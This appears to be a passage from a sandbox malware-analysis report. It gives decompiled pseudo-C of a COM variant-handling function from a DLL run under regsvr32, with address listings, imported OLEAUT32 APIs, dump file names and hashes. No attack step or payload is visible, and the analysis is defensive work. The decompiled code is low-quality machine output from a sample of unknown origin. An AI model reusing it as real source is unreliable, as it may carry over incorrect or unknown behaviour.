							 *((intOrPtr*)(_t322 - 0x48)) = 1;
							 *((intOrPtr*)(_t322 - 0x50)) = _t322 - 0x20;
						}
						 *((intOrPtr*)(_t322 - 0x68)) = 0x6da745a8;
						 *((intOrPtr*)(_t322 - 0x64)) = _t268;
						 *((intOrPtr*)(_t322 - 0x58)) = _t268;
						 *((intOrPtr*)(_t322 - 0x5c)) = _t268;
						 *((intOrPtr*)(_t322 - 0x60)) = _t268;
						_t201 =  *(_t322 - 0x4c);
						 *(_t322 - 4) = 1;
						_t313 = 4;
						__eflags =  *(_t322 - 0x4c) - _t268;
						if(__eflags != 0) {
							_t306 = 0x10;
							_t320 = E6DA3D6AF(__eflags,  ~(0 | __eflags > 0x00000000) | _t201 * _t306);
							 *((intOrPtr*)(_t322 - 0x54)) = _t320;
							E6DA5C5A0(_t313, _t320, _t268,  *(_t322 - 0x4c) << 4);
							_t244 =  *(_t322 + 0x18);
							_t290 =  *(_t322 - 0x4c) << 4;
							_t324 = _t324 + 0x10;
							__eflags =  *_t244;
							_t42 = _t290 - 0x10; // -16
							_t291 = _t320 + _t42;
							 *(_t322 - 0x14) = _t244;
							 *(_t322 - 0x10) = _t291;
							if( *_t244 != 0) {
								_t245 =  *(_t322 + 0x1c);
								_t269 = _t245 - 4;
								_t47 =  &(_t291[4]); // -8
								_t321 = _t47;
								_t246 = _t245 + 0xfffffff8;
								__eflags = _t246;
								 *(_t322 - 0x1c) = _t321;
								 *(_t322 + 0x1c) = _t246;
								do {
									_t248 =  *( *(_t322 - 0x14)) & 0x000000ff;
									 *_t291 = _t248;
									__eflags = _t248 & 0x00000040;
									if((_t248 & 0x00000040) != 0) {
										_t261 = _t248 & 0x0000ffbf | 0x00004000;
										__eflags = _t261;
										 *_t291 = _t261;
									}
									_t249 =  *_t291 & 0x0000ffff;
									__eflags = _t249 - 0x4002;
									if(__eflags > 0) {
										_t250 = _t249 - 0x4003;
										__eflags = _t250 - 0x12;
										if(_t250 <= 0x12) {
											switch( *((intOrPtr*)(_t250 * 4 +  &M6DA5834B))) {
												case 0:
													goto L42;
												case 1:
													 *(_t322 + 0x1c) =  *(_t322 + 0x1c) + _t313;
													_t269 = _t269 + _t313;
													_t252 =  *_t269;
													asm("sbb ecx, ecx");
													 *_t252 =  ~( *_t252) & 0x0000ffff;
													 *_t321 = _t252;
													_t253 = E6DA56CA1(_t322 - 0x34, _t321, _t252, _t252, 0);
													 *(_t322 - 4) = 3;
													E6DA57141(_t322 - 0x68, _t253);
													__eflags =  *(_t322 - 0x2c);
													 *(_t322 - 4) = 1;
													if(__eflags != 0) {
														E6DA3D6DE(_t269, _t313, _t321, __eflags,  *((intOrPtr*)(_t322 - 0x34)));
													}
													goto L43;
												case 2:
													goto L43;
											}
										}
									} else {
										if(__eflags == 0) {
											L42:
											 *(_t322 + 0x1c) =  *(_t322 + 0x1c) + _t313;
											_t269 = _t269 + _t313;
											__eflags = _t269;
											 *_t321 =  *_t269;
										} else {
											_t258 = _t249;
											__eflags = _t258 - 0x13;
											if(__eflags <= 0) {
												switch( *((intOrPtr*)(_t258 * 4 +  &M6DA582FB))) {
													case 0:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
														__ebx = __ebx + __edi;
														__ax =  *__ebx;
														goto L36;
													case 1:
														goto L42;
													case 2:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
														__eax =  *(__ebp + 0x1c);
														__ebx = __ebx + 8;
														 *__esi =  *( *(__ebp + 0x1c));
														goto L43;
													case 3:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
														__eax =  *(__ebp + 0x1c);
														__ebx = __ebx + 8;
														 *__esi =  *( *(__ebp + 0x1c));
														goto L43;
													case 4:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
														__ebx = __ebx + __edi;
														__eax =  *__ebx;
														goto L25;
													case 5:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
														__ebx = __ebx + __edi;
														__eax =  *__ebx;
														_push(__eax);
														 *(__ebp - 0x1c) = __eax;
														__imp__#2();
														__eflags =  *(__ebp - 0x1c);
														 *__esi = __eax;
														if( *(__ebp - 0x1c) != 0) {
															__eflags = __eax;
															if(__eflags == 0) {
																goto L31;
															}
														}
														goto L43;
													case 6:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
														__ebx = __ebx + __edi;
														 *__ebx =  ~( *__ebx);
														asm("sbb eax, eax");
														L36:
														 *__esi = __ax;
														goto L43;
													case 7:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
														__edi =  *(__ebp - 0x10);
														__ebx = __ebx + 4;
														__esi =  *__ebx;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														__esi =  *(__ebp - 0x1c);
														_push(4);
														_pop(__edi);
														goto L43;
													case 8:
														L32:
														 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
														__ebx = __ebx + __edi;
														__eax =  *__ebx;
														_push(__eax);
														__ecx = __ebp - 0x18;
														 *(__ebp - 0x1c) = __eax;
														__eax = E6DA4474C(__ebx, __ecx, __edi, __esi, __eflags);
														_push( *(__ebp - 0x18));
														 *((char*)(__ebp - 4)) = 2;
														__imp__#2();
														__eflags =  *(__ebp - 0x1c);
														 *__esi = __eax;
														if( *(__ebp - 0x1c) != 0) {
															__eflags = __eax;
															if(__eflags == 0) {
																L31:
																__eax = E6DA44860(__ecx);
																goto L32;
															}
														}
														__ecx =  *(__ebp - 0x10);
														_push(8);
														_pop(__eax);
														 *( *(__ebp - 0x10)) = __ax;
														__ecx =  *(__ebp - 0x18);
														__ecx =  *(__ebp - 0x18) + 0xfffffff0;
														 *((char*)(__ebp - 4)) = 1;
														__eax = E6DA21430(__ecx);
														goto L43;
													case 9:
														goto L43;
													case 0xa:
														 *(_t322 + 0x1c) =  *(_t322 + 0x1c) + _t313;
														_t269 = _t269 + _t313;
														 *_t321 =  *_t269;
														goto L43;
													case 0xb:
														__eax =  *(__ebp + 0x1c);
														__eax =  *(__ebp + 0x1c) + 8;
														 *(__ebp + 0x1c) = __eax;
														__ebx = __ebx + 8;
														__eflags = __ebx;
														L25:
														__ecx =  *__eax;
														 *__esi = __ecx;
														__esi[1] = __eax;
														goto L43;
												}
											}
										}
									}
									L43:
									_t291 =  *(_t322 - 0x10) - 0x10;
									_t321 = _t321 - 0x10;
									 *(_t322 - 0x14) =  &(( *(_t322 - 0x14))[1]);
									__eflags =  *( *(_t322 - 0x14));
									 *(_t322 - 0x10) = _t291;
									 *(_t322 - 0x1c) = _t321;
								} while ( *( *(_t322 - 0x14)) != 0);
								_t268 = 0;
								__eflags = 0;
							}
						}
						_t318 = 0;
						E6DA4BCB2(_t322 - 0x44);
						__eflags =  *(_t322 + 0x10) - _t268;
						if( *(_t322 + 0x10) != _t268) {
							_t318 = _t322 - 0x44;
						}
						E6DA5C5A0(_t313, _t322 - 0x88, _t268, 0x20);
						 *(_t322 - 0x28) =  *(_t322 - 0x28) | 0xffffffff;
						 *(_t322 + 0xc) =  *((intOrPtr*)( *( *( *(_t322 - 0x24))) + 0x18))(_t318, _t322 - 0x88, _t322 - 0x28);
						E6DA57DB5(_t268, _t322 - 0x68, _t313, _t318,  *( *(_t322 - 0x24)),  *((intOrPtr*)(_t322 + 8)), 0x6da791f8, _t268,  *(_t322 + 0xc), _t322 - 0x54);
						_t210 =  *(_t322 - 0x4c);
						__eflags = _t210 - _t268;
						if(__eflags != 0) {
							_t318 =  *(_t322 + 0x18);
							_t313 = (_t210 << 4) +  *((intOrPtr*)(_t322 - 0x54)) - 0x10;
							while(1) {
								__eflags =  *_t318;
								if(__eflags == 0) {
									goto L54;
								}
								_t238 =  *_t318;
								__eflags = _t238 - 8;
								if(_t238 == 8) {
									L51:
									__imp__#9(_t313);
								} else {
									__eflags = _t238 - 0xe;
									if(_t238 == 0xe) {
										goto L51;
									}
								}
								_t313 = _t313 - 0x10;
								_t318 = _t318 + 1;
								__eflags = _t318;
							}
						}
						L54:
						E6DA3D6DE(_t268, _t313, _t318, __eflags,  *((intOrPtr*)(_t322 - 0x54)));
						__eflags =  *(_t322 + 0xc) - _t268;
						 *((intOrPtr*)(_t322 - 0x54)) = _t268;
						if( *(_t322 + 0xc) < _t268) {
							__imp__#9(_t322 - 0x44);
							__eflags =  *(_t322 + 0xc) - 0x80020009;
							if(__eflags != 0) {
								_push( *(_t322 + 0xc));
								L57:
								E6DA442DB(_t268, _t313, _t318, __eflags);
							}
							__eflags =  *((intOrPtr*)(_t322 - 0x70)) - _t268;
							if(__eflags != 0) {
								 *((intOrPtr*)(_t322 - 0x70))(_t322 - 0x88);
							}
							_t219 = E6DA3D6AF(__eflags, 0x20);
							 *((intOrPtr*)(_t322 + 0x14)) = _t219;
							 *(_t322 - 4) = 4;
							__eflags = _t219 - _t268;
							if(__eflags != 0) {
								_push( *((intOrPtr*)(_t322 - 0x88)));
								_push(_t268);
								_push(_t268);
								_t268 = E6DA577F4(_t268, _t219, _t313, _t318, __eflags);
							}
							_t314 = __imp__#7;
							 *(_t322 - 4) = 1;
							_t220 =  *_t314( *((intOrPtr*)(_t322 - 0x84)));
							__eflags = _t220;
							if(_t220 != 0) {
								_t144 = _t268 + 0x18; // 0x18
								E6DA445D3(_t268, _t144,  *((intOrPtr*)(_t322 - 0x84)));
							}
							_t319 = __imp__#6;
							 *_t319( *((intOrPtr*)(_t322 - 0x84)));
							_t222 =  *_t314( *((intOrPtr*)(_t322 - 0x80)));
							__eflags = _t222;
							if(_t222 != 0) {
								_t148 = _t268 + 0xc; // 0xc
								E6DA445D3(_t268, _t148,  *((intOrPtr*)(_t322 - 0x80)));
							}
							 *_t319( *((intOrPtr*)(_t322 - 0x80)));
							_t224 =  *_t314( *((intOrPtr*)(_t322 - 0x7c)));
							__eflags = _t224;
							if(_t224 != 0) {
								_t152 = _t268 + 0x14; // 0x14
								E6DA445D3(_t268, _t152,  *((intOrPtr*)(_t322 - 0x7c)));
							}
							 *_t319( *((intOrPtr*)(_t322 - 0x7c)));
							 *((intOrPtr*)(_t268 + 0x10)) =  *((intOrPtr*)(_t322 - 0x78));
							 *((intOrPtr*)(_t268 + 0x1c)) =  *((intOrPtr*)(_t322 - 0x6c));
							 *((intOrPtr*)(_t322 + 0x14)) = _t268;
							E6DA5CBC5(_t322 + 0x14, 0x6da7e5e8);
						}
						_t318 =  *(_t322 + 0x10);
						__eflags = _t318 - _t268;
						if(_t318 != _t268) {
							__eflags = _t318 - 0xc;
							if(_t318 == 0xc) {
								L73:
								_t214 = (_t318 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t214 - 0x13;
								if(_t214 <= 0x13) {
									switch( *((intOrPtr*)(_t214 * 4 +  &M6DA58397))) {
										case 0:
											__eax =  *(__ebp + 0x14);
											 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
											goto L84;
										case 1:
											__eax =  *(__ebp + 0x14);
											__ecx =  *(__ebp - 0x3c);
											 *( *(__ebp + 0x14)) = __ecx;
											goto L84;
										case 2:
											__eax =  *(__ebp + 0x14);
											 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
											goto L84;
										case 3:
											__eax =  *(__ebp + 0x14);
											 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
											goto L84;
										case 4:
											__ecx =  *(__ebp - 0x3c);
											__eax =  *(__ebp + 0x14);
											 *__eax =  *(__ebp - 0x3c);
											__ecx =  *(__ebp - 0x38);
											 *(__eax + 4) = __ecx;
											goto L84;
										case 5:
											__eax = E6DA4B347(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
											_push( *(__ebp - 0x3c));
											__imp__#6();
											goto L84;
										case 6:
											__ecx =  *(__ebp + 0x14);
											__eax = 0;
											__eflags =  *(__ebp - 0x3c) - __bx;
											__eax = 0 | __eflags != 0x00000000;
											 *__ecx = __eflags != 0;
											goto L84;
										case 7:
											__edi =  *(__ebp + 0x14);
											__esi = __ebp - 0x44;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L84;
										case 8:
											goto L84;
										case 9:
											 *((char*)( *((intOrPtr*)(_t322 + 0x14)))) =  *((intOrPtr*)(_t322 - 0x3c));
											goto L84;
									}
								}
							} else {
								_t216 = _t322 - 0x44;
								__imp__#12(_t216, _t216, _t268, _t318);
								_t313 = _t216;
								__eflags = _t313 - _t268;
								if(__eflags >= 0) {
									goto L73;
								} else {
									__imp__#9(_t322 - 0x44);
									_push(_t313);
									goto L57;
								}
							}
						}
						L84:
						 *(_t322 - 4) = 0;
						E6DA57008(_t322 - 0x68);
						_t190 = _t322 - 4;
						 *_t190 =  *(_t322 - 4) | 0xffffffff;
						__eflags =  *_t190;
						_t197 = E6DA57D81(_t322 - 0x54);
					}
					return E6DA5C8E5(_t197);
				}
				L86:
			}

0x6da57db5
0x6da57db7
0x6da57db8
0x6da57db9
0x6da57dbb
0x6da57dc0
0x6da57e06
0x6da57e08
0x6da57dc2
0x6da57dc2
0x6da57dc3
0x6da57dc4
0x6da57dce
0x00000000
0x00000000
0x6da57dd1
0x6da57ddc
0x00000000
0x6da57dde
0x6da57de1
0x6da57de9
0x6da57df3
0x6da57dfd
0x6da57dfe
0x6da57e03
0x00000000
0x6da57e05
0x00000000
0x6da57e05
0x6da57e03
0x00000000
0x6da57ddc
0x6da57e09
0x6da57e0e
0x6da57e0f
0x6da57e16
0x6da57e1b
0x6da57e1e
0x6da57e20
0x6da57e22
0x6da57e28
0x6da57e2b
0x6da57e2e
0x6da57e31
0x6da57e3b
0x6da57e3e
0x6da57e43
0x6da57e46
0x6da57e49
0x6da57e54
0x6da57e54
0x6da57e57
0x6da57e5b
0x6da57e62
0x6da57e67
0x6da57e6e
0x6da57e6e
0x6da57e71
0x6da57e78
0x6da57e7b
0x6da57e7e
0x6da57e81
0x6da57e84
0x6da57e89
0x6da57e8d
0x6da57e8e
0x6da57e90
0x6da57e9a
0x6da57eaa
0x6da57eb5
0x6da57eb8
0x6da57ec0
0x6da57ec3
0x6da57ec6
0x6da57ec9
0x6da57ecc
0x6da57ecc
0x6da57ed0
0x6da57ed3
0x6da57ed6
0x6da57edc
0x6da57edf
0x6da57ee2
0x6da57ee2
0x6da57ee5
0x6da57ee5
0x6da57ee8
0x6da57eeb
0x6da57eee
0x6da57ef1
0x6da57ef5
0x6da57ef8
0x6da57efa
0x6da57f01
0x6da57f01
0x6da57f06
0x6da57f06
0x6da57f09
0x6da57f11
0x6da57f13
0x6da58031
0x6da58036
0x6da58039
0x6da5803b
0x00000000
0x00000000
0x00000000
0x6da58042
0x6da58045
0x6da58047
0x6da5804d
0x6da58057
0x6da5805e
0x6da58060
0x6da58069
0x6da5806d
0x6da58072
0x6da58076
0x6da5807a
0x6da5807f
0x6da58084
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5803b
0x6da57f19
0x6da57f19
0x6da58087
0x6da58087
0x6da5808a
0x6da5808a
0x6da5808e
0x6da57f1f
0x6da57f20
0x6da57f21
0x6da57f24
0x6da57f2a
0x00000000
0x6da57f3f
0x6da57f42
0x6da57f44
0x00000000
0x00000000
0x00000000
0x00000000
0x6da57f67
0x6da57f6b
0x6da57f70
0x6da57f73
0x00000000
0x00000000
0x6da57f7a
0x6da57f7e
0x6da57f83
0x6da57f86
0x00000000
0x00000000
0x6da57f8d
0x6da57f90
0x6da57f92
0x00000000
0x00000000
0x6da57f96
0x6da57f99
0x6da57f9b
0x6da57f9d
0x6da57f9e
0x6da57fa1
0x6da57fa7
0x6da57fab
0x6da57fad
0x6da57fb3
0x6da57fb5
0x00000000
0x00000000
0x6da57fb5
0x00000000
0x00000000
0x6da58009
0x6da5800c
0x6da58010
0x6da58012
0x6da58014
0x6da58014
0x00000000
0x00000000
0x6da58019
0x6da5801d
0x6da58020
0x6da58023
0x6da58025
0x6da58026
0x6da58027
0x6da58028
0x6da58029
0x6da5802c
0x6da5802e
0x00000000
0x00000000
0x6da57fc0
0x6da57fc0
0x6da57fc3
0x6da57fc5
0x6da57fc7
0x6da57fc8
0x6da57fcb
0x6da57fce
0x6da57fd3
0x6da57fd6
0x6da57fda
0x6da57fe0
0x6da57fe4
0x6da57fe6
0x6da57fe8
0x6da57fea
0x6da57fbb
0x6da57fbb
0x00000000
0x6da57fbb
0x6da57fea
0x6da57fec
0x6da57fef
0x6da57ff1
0x6da57ff2
0x6da57ff5
0x6da57ff8
0x6da57ffb
0x6da57fff
0x00000000
0x00000000
0x00000000
0x00000000
0x6da57f31
0x6da57f34
0x6da57f38
0x00000000
0x00000000
0x6da57f4c
0x6da57f4f
0x6da57f52
0x6da57f55
0x6da57f55
0x6da57f58
0x6da57f58
0x6da57f5a
0x6da57f5f
0x00000000
0x00000000
0x6da57f2a
0x6da57f24
0x6da57f19
0x6da58090
0x6da58093
0x6da58096
0x6da58099
0x6da5809f
0x6da580a2
0x6da580a5
0x6da580a5
0x6da580ae
0x6da580ae
0x6da580ae
0x6da57ed6
0x6da580b4
0x6da580b6
0x6da580bb
0x6da580bf
0x6da580c1
0x6da580c1
0x6da580ce
0x6da580d8
0x6da58104
0x6da58107
0x6da5810c
0x6da5810f
0x6da58111
0x6da58116
0x6da5811c
0x6da58137
0x6da58137
0x6da5813a
0x00000000
0x00000000
0x6da58122
0x6da58124
0x6da58126
0x6da5812c
0x6da5812d
0x6da58128
0x6da58128
0x6da5812a
0x00000000
0x00000000
0x6da5812a
0x6da58133
0x6da58136
0x6da58136
0x6da58136
0x6da58137
0x6da5813c
0x6da5813f
0x6da58144
0x6da58148
0x6da5814b
0x6da58155
0x6da5815b
0x6da58162
0x6da58164
0x6da58167
0x6da58167
0x6da58167
0x6da5816c
0x6da5816f
0x6da58178
0x6da58178
0x6da5817d
0x6da58183
0x6da58186
0x6da5818a
0x6da5818c
0x6da5818e
0x6da58196
0x6da58197
0x6da5819d
0x6da5819d
0x6da581a5
0x6da581ab
0x6da581af
0x6da581b1
0x6da581b3
0x6da581bb
0x6da581be
0x6da581be
0x6da581c9
0x6da581cf
0x6da581d4
0x6da581d6
0x6da581d8
0x6da581dd
0x6da581e0
0x6da581e0
0x6da581e8
0x6da581ed
0x6da581ef
0x6da581f1
0x6da581f6
0x6da581f9
0x6da581f9
0x6da58201
0x6da58206
0x6da5820c
0x6da58218
0x6da5821b
0x6da5821b
0x6da58220
0x6da58223
0x6da58226
0x6da5822c
0x6da58230
0x6da58255
0x6da58258
0x6da5825b
0x6da5825e
0x6da58260
0x00000000
0x6da58271
0x6da58278
0x00000000
0x00000000
0x6da582d3
0x6da582d6
0x6da582d9
0x00000000
0x00000000
0x6da58290
0x6da58293
0x00000000
0x00000000
0x6da5829a
0x6da5829d
0x00000000
0x00000000
0x6da5827d
0x6da58280
0x6da58283
0x6da58285
0x6da58288
0x00000000
0x00000000
0x6da582a7
0x6da582ac
0x6da582af
0x00000000
0x00000000
0x6da582b7
0x6da582ba
0x6da582bc
0x6da582c0
0x6da582c3
0x00000000
0x00000000
0x6da582c7
0x6da582ca
0x6da582cd
0x6da582ce
0x6da582cf
0x6da582d0
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5826d
0x00000000
0x00000000
0x6da58260
0x6da58232
0x6da58234
0x6da58239
0x6da5823f
0x6da58241
0x6da58243
0x00000000
0x6da58245
0x6da58249
0x6da5824f
0x00000000
0x6da5824f
0x6da58243
0x6da58230
0x6da582db
0x6da582de
0x6da582e2
0x6da582e7
0x6da582e7
0x6da582e7
0x6da582ee
0x6da582ee
0x6da582f8
0x6da582f8
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 6DA57E16
lstrlenA.KERNEL32(?,00000004,00000000,6DA5810C), ref: 6DA57E4E
VariantClear.OLEAUT32(?), ref: 6DA5812D
VariantClear.OLEAUT32(?), ref: 6DA58155
SysStringLen.OLEAUT32(?), ref: 6DA581AF
SysFreeString.OLEAUT32(?), ref: 6DA581CF
SysStringLen.OLEAUT32(?), ref: 6DA581D4
SysFreeString.OLEAUT32(?), ref: 6DA581E8
SysStringLen.OLEAUT32(?), ref: 6DA581ED
SysFreeString.OLEAUT32(?), ref: 6DA58201
__CxxThrowException@8.LIBCMT ref: 6DA5821B
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 6DA58239
VariantClear.OLEAUT32(?), ref: 6DA58249

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: String$Variant$ClearFree$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 1765679327-0
Opcode ID: 3eaf1bc8ee44e6957a7adcf1fb556aa1c903cb8cb484bc4b4265f4b1c4b4699b
Instruction ID: 011c502292d270e62ac7bf6875588677937c7883842b4989f3427c8505f8da92
Opcode Fuzzy Hash: 3eaf1bc8ee44e6957a7adcf1fb556aa1c903cb8cb484bc4b4265f4b1c4b4699b
Instruction Fuzzy Hash: 0D02BE75D1830ADFDF01CFA8C984AAEBBB4FF45304F148059E911AB290DB749AA6CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6DA57E0F Relevance: 22.9, APIs: 15, Instructions: 402
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E6DA57E0F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t188;
				signed int _t201;
				signed int _t205;
				void* _t207;
				intOrPtr _t210;
				char _t229;
				CHAR* _t235;
				intOrPtr _t236;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t249;
				signed int _t256;
				signed int _t257;
				signed int _t276;
				signed short* _t277;
				signed int _t289;
				void* _t292;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed short* _t298;
				void* _t299;
				void* _t300;
				void* _t301;
				void* _t312;

				_push(0x7c);
				_t188 = E6DA5C80D(E6DA6F149, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t299 - 0x24)) = __ecx;
				_t256 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L77:
					return E6DA5C8E5(_t188);
				}
				 *((intOrPtr*)(_t299 - 0x54)) = 0;
				 *((intOrPtr*)(_t299 - 0x50)) = 0;
				 *(_t299 - 0x4c) = 0;
				 *((intOrPtr*)(_t299 - 0x48)) = 0;
				 *(_t299 - 4) = 0;
				E6DA5C5A0(__edi, _t299 - 0x54, 0, 0x10);
				_t301 = _t300 + 0xc;
				if( *(_t299 + 0x18) != 0) {
					 *(_t299 - 0x4c) = lstrlenA( *(_t299 + 0x18));
				}
				 *((intOrPtr*)(_t299 - 0x20)) = 0xfffffffd;
				if(( *(_t299 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t299 - 0x48)) = 1;
					 *((intOrPtr*)(_t299 - 0x50)) = _t299 - 0x20;
				}
				 *((intOrPtr*)(_t299 - 0x68)) = 0x6da745a8;
				 *((intOrPtr*)(_t299 - 0x64)) = _t256;
				 *((intOrPtr*)(_t299 - 0x58)) = _t256;
				 *((intOrPtr*)(_t299 - 0x5c)) = _t256;
				 *((intOrPtr*)(_t299 - 0x60)) = _t256;
				_t192 =  *(_t299 - 0x4c);
				 *(_t299 - 4) = 1;
				_t292 = 4;
				_t307 =  *(_t299 - 0x4c) - _t256;
				if( *(_t299 - 0x4c) == _t256) {
					L37:
					_t295 = 0;
					E6DA4BCB2(_t299 - 0x44);
					if( *(_t299 + 0x10) != _t256) {
						_t295 = _t299 - 0x44;
					}
					E6DA5C5A0(_t292, _t299 - 0x88, _t256, 0x20);
					 *(_t299 - 0x28) =  *(_t299 - 0x28) | 0xffffffff;
					 *(_t299 + 0xc) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t299 - 0x24)))))) + 0x18))(_t295, _t299 - 0x88, _t299 - 0x28);
					E6DA57DB5(_t256, _t299 - 0x68, _t292, _t295,  *((intOrPtr*)( *((intOrPtr*)(_t299 - 0x24)))),  *((intOrPtr*)(_t299 + 8)), 0x6da791f8, _t256,  *(_t299 + 0xc), _t299 - 0x54);
					_t201 =  *(_t299 - 0x4c);
					if(_t201 == _t256) {
						L46:
						E6DA3D6DE(_t256, _t292, _t295, _t318,  *((intOrPtr*)(_t299 - 0x54)));
						 *((intOrPtr*)(_t299 - 0x54)) = _t256;
						if( *(_t299 + 0xc) >= _t256) {
							L61:
							_t295 =  *(_t299 + 0x10);
							if(_t295 == _t256) {
								L76:
								 *(_t299 - 4) = 0;
								E6DA57008(_t299 - 0x68);
								_t184 = _t299 - 4;
								 *_t184 =  *(_t299 - 4) | 0xffffffff;
								__eflags =  *_t184;
								_t188 = E6DA57D81(_t299 - 0x54);
								goto L77;
							}
							if(_t295 == 0xc) {
								L65:
								_t205 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t205 - 0x13;
								if(_t205 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t205 * 4 +  &M6DA58397))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E6DA4B347(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t299 + 0x14)))) =  *((intOrPtr*)(_t299 - 0x3c));
										goto L76;
								}
							}
							_t207 = _t299 - 0x44;
							__imp__#12(_t207, _t207, _t256, _t295);
							_t292 = _t207;
							_t320 = _t292 - _t256;
							if(_t292 >= _t256) {
								goto L65;
							}
							__imp__#9(_t299 - 0x44);
							_push(_t292);
							L49:
							E6DA442DB(_t256, _t292, _t295, _t320);
							L50:
							_t321 =  *((intOrPtr*)(_t299 - 0x70)) - _t256;
							if( *((intOrPtr*)(_t299 - 0x70)) != _t256) {
								 *((intOrPtr*)(_t299 - 0x70))(_t299 - 0x88);
							}
							_t210 = E6DA3D6AF(_t321, 0x20);
							 *((intOrPtr*)(_t299 + 0x14)) = _t210;
							 *(_t299 - 4) = 4;
							_t322 = _t210 - _t256;
							if(_t210 != _t256) {
								_push( *((intOrPtr*)(_t299 - 0x88)));
								_push(_t256);
								_push(_t256);
								_t256 = E6DA577F4(_t256, _t210, _t292, _t295, _t322);
							}
							_push( *((intOrPtr*)(_t299 - 0x84)));
							_t293 = __imp__#7;
							 *(_t299 - 4) = 1;
							if( *_t293() != 0) {
								_t138 = _t256 + 0x18; // 0x18
								E6DA445D3(_t256, _t138,  *((intOrPtr*)(_t299 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t299 - 0x84)));
							_push( *((intOrPtr*)(_t299 - 0x80)));
							if( *_t293() != 0) {
								_t142 = _t256 + 0xc; // 0xc
								E6DA445D3(_t256, _t142,  *((intOrPtr*)(_t299 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t299 - 0x80)));
							_push( *((intOrPtr*)(_t299 - 0x7c)));
							if( *_t293() != 0) {
								_t146 = _t256 + 0x14; // 0x14
								E6DA445D3(_t256, _t146,  *((intOrPtr*)(_t299 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t299 - 0x7c)));
							 *((intOrPtr*)(_t256 + 0x10)) =  *((intOrPtr*)(_t299 - 0x78));
							 *((intOrPtr*)(_t256 + 0x1c)) =  *((intOrPtr*)(_t299 - 0x6c));
							 *((intOrPtr*)(_t299 + 0x14)) = _t256;
							E6DA5CBC5(_t299 + 0x14, 0x6da7e5e8);
							goto L61;
						}
						__imp__#9(_t299 - 0x44);
						_t320 =  *(_t299 + 0xc) - 0x80020009;
						if( *(_t299 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t299 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t299 + 0x18);
						_t292 = (_t201 << 4) +  *((intOrPtr*)(_t299 - 0x54)) - 0x10;
						while(1) {
							_t318 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t229 =  *_t295;
							__eflags = _t229 - 8;
